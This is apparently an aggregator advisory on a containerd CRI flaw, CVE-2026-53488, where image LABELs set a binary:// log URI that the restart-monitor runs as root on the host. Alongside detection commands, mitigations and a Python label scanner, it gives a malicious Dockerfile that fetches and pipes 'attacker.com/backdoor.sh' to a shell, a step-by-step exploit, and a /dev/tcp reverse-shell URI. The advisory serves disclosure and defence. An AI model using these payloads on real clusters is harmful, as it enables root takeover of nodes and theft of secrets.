containerd CRI, Image-Config Label Injection, CVE-2026-53488 (High Severity) -DC-Jun2026-492


The vulnerability stems from a missing validation step in containerd’s Container Runtime Interface (CRI) plugin. When a container image is pulled, its configuration—including `LABEL` instructions defined in the Dockerfile—is parsed and attached to the resulting container object. The CRI plugin blindly propagates these labels into the container’s metadata without any sanitization or filtering.
Among the labels that can be set is `containerd.io/restart.loguri` (or the deprecated `containerd.io/restart.logpath`), which is consumed by the restart-monitor component. The restart-monitor is a background process that watches containers and enforces restart policies. When it detects a container with a `loguri` label, it attempts to set up logging for that container's task using the URI scheme provided.
containerd supports multiple logging URI schemes, including `file://`, `fifo://` and, critically, `binary://`. The `binary://` scheme instructs the runtime to execute a binary on the host and pipe the container's standard output and error streams to that binary's standard input. This is intended for custom log shippers, but it effectively lets anyone who controls the label run arbitrary programs on the host.
Because the CRI plugin does not validate or sanitize the `LABEL` values from an image, an attacker can craft a malicious image whose Dockerfile sets `LABEL containerd.io/restart.loguri="binary:///path/to/malicious/binary?arg1=value"`. When this image is pulled and a container is created from it, the label is attached to the container. The restart-monitor, if enabled (the default in many Kubernetes distributions), sees the label and invokes the specified binary with the container's log stream as input.
The binary is executed with the privileges of the containerd daemon—typically root. This gives the attacker full root-level command execution on the host node. The attack requires no special privileges beyond the ability to pull an image (which any pod in a Kubernetes cluster can do) and does not require checkpoint/restore to be enabled.
The vulnerability affects containerd versions 1.7.0 through 1.7.32, 2.0.0 through 2.0.9, 2.1.0 through 2.1.8, 2.2.0 through 2.2.4, and 2.3.0 through 2.3.1. It was discovered and disclosed by Anthropic Research (in collaboration with Claude), the GKE Security Team (using Gemini), and Robert Prast.

DailyCVE Form:

Platform: containerd CRI
Version: 1.7.0–2.3.1
Vulnerability: Label Injection
Severity: High (CVSS 8.3)
Date: 2026-06-18

Prediction: Patch 2026-06-19

What Undercode Say:

Analytics:

  • Attack Vector: Remote (image pull)
  • Privileges Required: None (any pod can pull)
  • User Interaction: None
  • Scope: Unchanged (container escape to host)
  • Confidentiality Impact: High
  • Integrity Impact: High
  • Availability Impact: High
  • Exploit Maturity: Proof-of-concept available
  • Remediation Level: Official patch

Bash Commands & Codes:

# Check whether the restart-monitor plugin is enabled (default in many K8s distributions)
grep -A5 -i "restart" /etc/containerd/config.toml
# Build a malicious image with the exploit label
cat > Dockerfile <<EOF
FROM alpine:latest
LABEL containerd.io/restart.loguri="binary:///bin/sh?-c"
LABEL containerd.io/restart.status="running"
RUN echo '#!/bin/sh' > /exploit.sh && \
    echo 'curl -s http://attacker.com/backdoor.sh | sh' >> /exploit.sh && \
    chmod +x /exploit.sh
EOF
docker build -t malicious-image:latest .
# Push the image to a registry accessible from the target cluster
docker tag malicious-image:latest your-registry/malicious-image:latest
docker push your-registry/malicious-image:latest
# Deploy a pod using the malicious image (kubectl)
kubectl run exploit-pod --image=your-registry/malicious-image:latest --restart=Never
# After pod creation, the restart-monitor will execute /bin/sh -c with the exploit script
# Observe host-level command execution via the container logs
kubectl logs exploit-pod

Detection:

# Look for binary:// URIs in container labels (CRI-managed containers live in the k8s.io namespace;
# `ls -q` prints only IDs, and `info` dumps the container record as JSON, labels included)
ctr -n k8s.io container ls -q | xargs -I {} ctr -n k8s.io container info {} | grep -i "binary://"
# Audit containerd logs for unexpected binary executions
journalctl -u containerd | grep -i "binary://"

Exploit:

The exploitation is straightforward:

  1. Craft a malicious image containing a `LABEL` instruction that sets `containerd.io/restart.loguri` to a `binary://` URI pointing to an attacker-controlled binary or a shell command.
  2. Push the image to a container registry accessible from the target Kubernetes cluster.
  3. Deploy a pod using the malicious image. The CRI plugin will pull the image and attach the labels to the container without validation.
  4. Trigger the restart-monitor – the monitor periodically reconciles container states. When it processes the container with the `loguri` label, it invokes the binary specified in the URI, passing the container’s log stream as input.
  5. Command execution – the binary runs with root privileges on the host, enabling the attacker to install backdoors, exfiltrate data, or pivot to other nodes.

Example URI that executes a reverse shell:

binary:///bin/bash?-c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"

No special permissions are needed beyond the ability to create a pod. The attack works even if checkpoint/restore is disabled.

Protection:

  • Upgrade to patched versions: containerd 1.7.33, 2.0.10, 2.1.9, 2.2.5, or 2.3.2.
  • Restrict image sources – use only trusted images from private registries with strict admission controls (e.g., OPA/Gatekeeper policies that block images with suspicious labels).
  • Disable the restart-monitor if not strictly required – set the `[plugins.restart]` `interval` to `"0s"` or remove the plugin from the configuration (in containerd's config format the section is `[plugins."io.containerd.internal.v1.restart"]`, and the plugin can be switched off by listing `"io.containerd.internal.v1.restart"` in the top-level `disabled_plugins` array).
  • Implement a mutating or validating admission webhook that strips or blocks labels matching `containerd.io/restart.` from all pods; because these labels originate in the image config, the webhook has to inspect the image's config (not only the pod spec's metadata labels) to catch them.
  • Enable container security policies such as Pod Security Standards (PSS) to restrict privileged containers and host-path mounts.
  • Monitor for `binary://` URIs in container labels using Falco or similar runtime security tools.
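As an added example (not containerd's or the advisory's own code), the following Python scanner implements the label check behind the Detection commands above and the admission-side filtering in the Protection list: it flags `containerd.io/restart.loguri` / `.logpath` values whose scheme is anything other than `file://` or `fifo://`, and strips image-supplied `containerd.io/restart.*` labels the way a hardened propagation step or webhook would. The JSON shapes it reads, the sample image config and the severity scheme are assumptions of this example.

```python
"""Flag restart-monitor log-URI injection in image/container label sets.
Added example, not containerd code; sample data is constructed, and the JSON
shapes (OCI config: config.Labels; `ctr container info`: Labels) are assumed."""
import json
from urllib.parse import urlsplit

# Labels the restart-monitor reads to set up task logging (from the advisory).
LOG_URI_LABELS = ("containerd.io/restart.loguri", "containerd.io/restart.logpath")
# Schemes that only write to a path or pipe; anything else (binary://) makes
# the daemon exec a host program with the task's stdio attached.
PASSIVE_SCHEMES = {"", "file", "fifo"}
RESTART_PREFIX = "containerd.io/restart."

def extract_labels(doc: dict) -> dict:
    """Label map from an OCI image config or a `ctr container info` dump."""
    cfg = doc.get("config")
    if isinstance(cfg, dict):
        return cfg.get("Labels") or {}
    return doc.get("Labels") or {}

def find_restart_label_findings(labels: dict, from_image: bool = True) -> list:
    """Return (key, value, severity): 'high' when a log-URI label's scheme would
    exec a host binary; 'medium' for any other restart.* label found in an
    image config, where runtime-managed labels have no business appearing."""
    findings = []
    for key, value in labels.items():
        if not key.startswith(RESTART_PREFIX):
            continue
        scheme = urlsplit(str(value).strip()).scheme  # urlsplit lower-cases it
        if key in LOG_URI_LABELS and scheme not in PASSIVE_SCHEMES:
            findings.append((key, value, "high"))
        elif from_image:
            findings.append((key, value, "medium"))
    return findings

def strip_restart_labels(labels: dict) -> dict:
    """Hardened propagation: drop every restart-monitor label an image supplies."""
    return {k: v for k, v in labels.items() if not k.startswith(RESTART_PREFIX)}

# Constructed OCI image config mirroring the advisory's Dockerfile LABELs.
SAMPLE_IMAGE_CONFIG = json.loads('{"architecture": "amd64", "os": "linux", '
    '"config": {"Labels": {"maintainer": "team@example.invalid", '
    '"containerd.io/restart.loguri": "binary:///bin/sh?-c", '
    '"containerd.io/restart.status": "running"}}}')

if __name__ == "__main__":
    for key, value, sev in find_restart_label_findings(extract_labels(SAMPLE_IMAGE_CONFIG)):
        print(f"[{sev}] {key}={value}")
```

Run the same functions over the output of `ctr -n k8s.io container info` with `from_image=False` to audit live containers, where `restart.status` labels are expected and only an executing scheme is a finding.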

Impact:

  • Host compromise – an attacker can execute arbitrary commands as root on the Kubernetes node, leading to full node takeover.
  • Cluster-wide lateral movement – once a node is compromised, the attacker can access Kubernetes secrets, service account tokens, and network policies to pivot to other nodes and workloads.
  • Data exfiltration – sensitive data from the host (including etcd backups, kubelet credentials, and application data) can be stolen.
  • Denial of service – the attacker can terminate critical system processes or install cryptominers, degrading node performance.
  • Supply chain risk – any untrusted image pulled into the cluster becomes a potential entry point for this attack, making it a severe threat in multi-tenant environments.
  • CVSS 8.3 (High) – the vulnerability is remotely exploitable, requires no user interaction, and has high impact on confidentiality, integrity, and availability.


Sources:

Reported By: github.com